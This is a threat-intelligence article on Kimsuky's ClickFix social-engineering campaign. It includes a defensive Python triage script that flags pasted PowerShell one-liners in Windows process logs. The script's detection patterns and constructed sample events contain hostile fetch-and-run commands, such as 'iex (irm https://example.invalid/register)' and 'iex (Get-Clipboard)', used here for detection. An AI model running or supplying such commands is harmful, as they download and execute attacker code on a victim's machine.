North Korean state-sponsored group Kimsuky, also tracked as Emerald Sleet (Microsoft) and VELVET CHOLLIMA (CrowdStrike), has been observed using the social engineering tactic known as “ClickFix” to deliver malware to South Korean targets. The victim is shown a fake error or verification prompt and told to click a “Fix It” button; the button copies a command to the clipboard, and the page instructs the user to paste it into the Windows Run dialog or a PowerShell console. Executing that pasted command downloads and runs the malware, so the victim, not an exploit, performs the final step, and the malicious script never has to arrive as a file that mail or endpoint filters would inspect.
The ClickFix tactic, first observed in mid-2024, has since been used to distribute infostealers and droppers in both targeted and opportunistic campaigns. It predominantly targets Windows users, but Linux and macOS variants have also been observed. Variations include fake human-verification (CAPTCHA) challenges and prompts to install supposed security updates; in every case the lure ends with the user running the attacker's command themselves.
In a recent campaign identified by Microsoft’s threat analysts, the group first built rapport with targets through ordinary correspondence, then sent spear-phishing emails with PDF attachments. Recipients were instructed to “register” their device by opening PowerShell as an administrator and pasting code supplied by the threat actors. Once executed, the code installs a remote desktop tool and retrieves a certificate file with a hardcoded PIN from a remote server, giving the attackers persistent access to the compromised device and the ability to exfiltrate data. Because the user runs the code in an elevated console, the attachment itself needs no exploit or macro and the resulting process tree looks like administrator activity rather than a malware drop.
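To make the defender's side of this concrete, the following is an added example, not code from the article, from Microsoft or from the campaign: a Python triage script that scores exported Windows process-creation records for the combination of tells a ClickFix paste typically leaves behind (hidden window, policy bypass, remote fetch followed by Invoke-Expression, an encoded command, a clipboard read, PowerShell spawned directly by explorer.exe) and decodes any -EncodedCommand payload so that indicators hidden inside it are scored too. It generalizes beyond this one campaign to the tactic as a whole. The record format, indicator weights, threshold, hostnames, usernames and URLs are all assumptions constructed for the example.

```python
"""Heuristic triage of Windows process-creation records for ClickFix-style
pasted PowerShell one-liners.

Added example for this article; not code from Microsoft, the article's author
or the Kimsuky campaign. Assumes a pipe-delimited export of process-creation
events (e.g. Sysmon Event ID 1 or Security 4688) with the fields
timestamp|host|user|parent_image|command_line. Indicators, weights, threshold
and the sample records are constructed for illustration.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Generic ClickFix tells: a one-liner that hides its window, bypasses policy,
# fetches a second stage and evaluates it, or reads the payload back off the
# clipboard. Weights are an assumption; tune them against your own baseline.
INDICATORS = [
    ("hidden_window",    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("bypass_policy",    re.compile(r"-e(?:xecutionpolicy|xec|x|p)\s+bypass", re.I), 2),
    ("encoded_command",  re.compile(r"-e(?:nc|c|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("remote_fetch",     re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                                    r"curl|wget|downloadstring|downloadfile)\b", re.I), 2),
    ("dynamic_exec",     re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3),
    ("lolbin",           re.compile(r"\b(?:mshta|certutil|bitsadmin|rundll32)\b", re.I), 2),
    ("clipboard_source", re.compile(r"get-clipboard", re.I), 2),
    ("self_elevation",   re.compile(r"-verb\s+runas", re.I), 2),
]
# PowerShell spawned straight from the shell (Win+R / Run dialog) rather than
# by a script host or scheduler is the usual parent after a ClickFix paste.
SHELL_PARENTS = {"explorer.exe"}
PARENT_WEIGHT = 2
THRESHOLD = 5  # assumption: a single tell never fires, a pasted combo does

ENCODED_RX = re.compile(r"-e(?:nc|c|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None."""
    m = ENCODED_RX.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    host: str
    user: str
    score: int
    hits: List[str]
    command_line: str
    decoded: Optional[str] = None


def score_command(parent_image: str, cmdline: str):
    """Score one record. The decoded payload is scored with the raw command
    line, so an -enc wrapper cannot hide an iex or Get-Clipboard inside."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else f"{cmdline}\n{decoded}"
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    if parent_image.lower().rsplit("\\", 1)[-1] in SHELL_PARENTS:
        hits.append("shell_parent")
        score += PARENT_WEIGHT
    return score, hits, decoded


def parse_record(line: str):
    parts = line.rstrip("\n").split("|", 4)  # command lines may contain '|'
    if len(parts) != 5:
        return None
    _ts, host, user, parent_image, cmdline = parts
    return host, user, parent_image, cmdline


def triage(lines, threshold: int = THRESHOLD) -> List[Finding]:
    findings = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        host, user, parent_image, cmdline = rec
        score, hits, decoded = score_command(parent_image, cmdline)
        if score >= threshold:
            findings.append(Finding(host, user, score, hits, cmdline, decoded))
    return findings


# Constructed sample export (hosts, users and .invalid URLs are placeholders).
# Line 3's base64 is UTF-16LE for "Get-Clipboard|iex"; lines 1 and 4 are benign.
SAMPLE_EVENTS = """\
2025-02-10T09:14:02Z|WS-042|CORP\\jlee|C:\\Windows\\explorer.exe|powershell.exe Get-ChildItem C:\\Reports -Recurse | Measure-Object
2025-02-10T09:16:55Z|WS-042|CORP\\jlee|C:\\Windows\\explorer.exe|powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/register)"
2025-02-10T09:17:30Z|WS-042|CORP\\jlee|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -enc RwBlAHQALQBDAGwAaQBwAGIAbwBhAHIAZAB8AGkAZQB4AA==
2025-02-10T09:20:11Z|WS-017|CORP\\admin|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|Invoke-WebRequest -Uri https://updates.corp.invalid/agent.msi -OutFile C:\\Temp\\agent.msi
2025-02-10T09:21:44Z|WS-017|CORP\\admin|C:\\Windows\\explorer.exe|powershell -w hidden -c "iex (Get-Clipboard)"
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS.splitlines()):
        print(f"{f.host} {f.user} score={f.score} hits={f.hits}")
        if f.decoded:
            print(f"  decoded: {f.decoded}")
```

On the constructed sample, records 2, 3 and 5 are flagged while the ordinary Get-ChildItem launch and the administrator's plain Invoke-WebRequest stay below the threshold; the point of the weighting is that no single flag is damning, but the stack of them a pasted ClickFix one-liner produces is. Record 3 only scores because the -enc payload is decoded first, which is why the decoded text is fed back into the indicator pass.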
This shift in tactics by Emerald Sleet indicates a strategic move towards individuals involved in international affairs, NGOs, government agencies, and media outlets across various regions. Security awareness and anti-phishing training remain important, but ClickFix is built specifically to talk a trained user into running the command anyway, so organizations are advised to add technical controls such as Microsoft Defender attack surface reduction (ASR) rules, and to ensure PowerShell script block logging and process command-line logging are enabled so that a pasted one-liner leaves a trace that can be detected and investigated.
Users should treat any web page, email or PDF that asks them to open PowerShell or the Run dialog and paste a command as malicious, regardless of how the request is framed, and should refrain from clicking unknown links or opening attachments from untrusted sources. By staying informed and adopting proactive security measures, individuals and organizations can better protect themselves against state-sponsored actors like Kimsuky and their use of social engineering tactics like ClickFix.

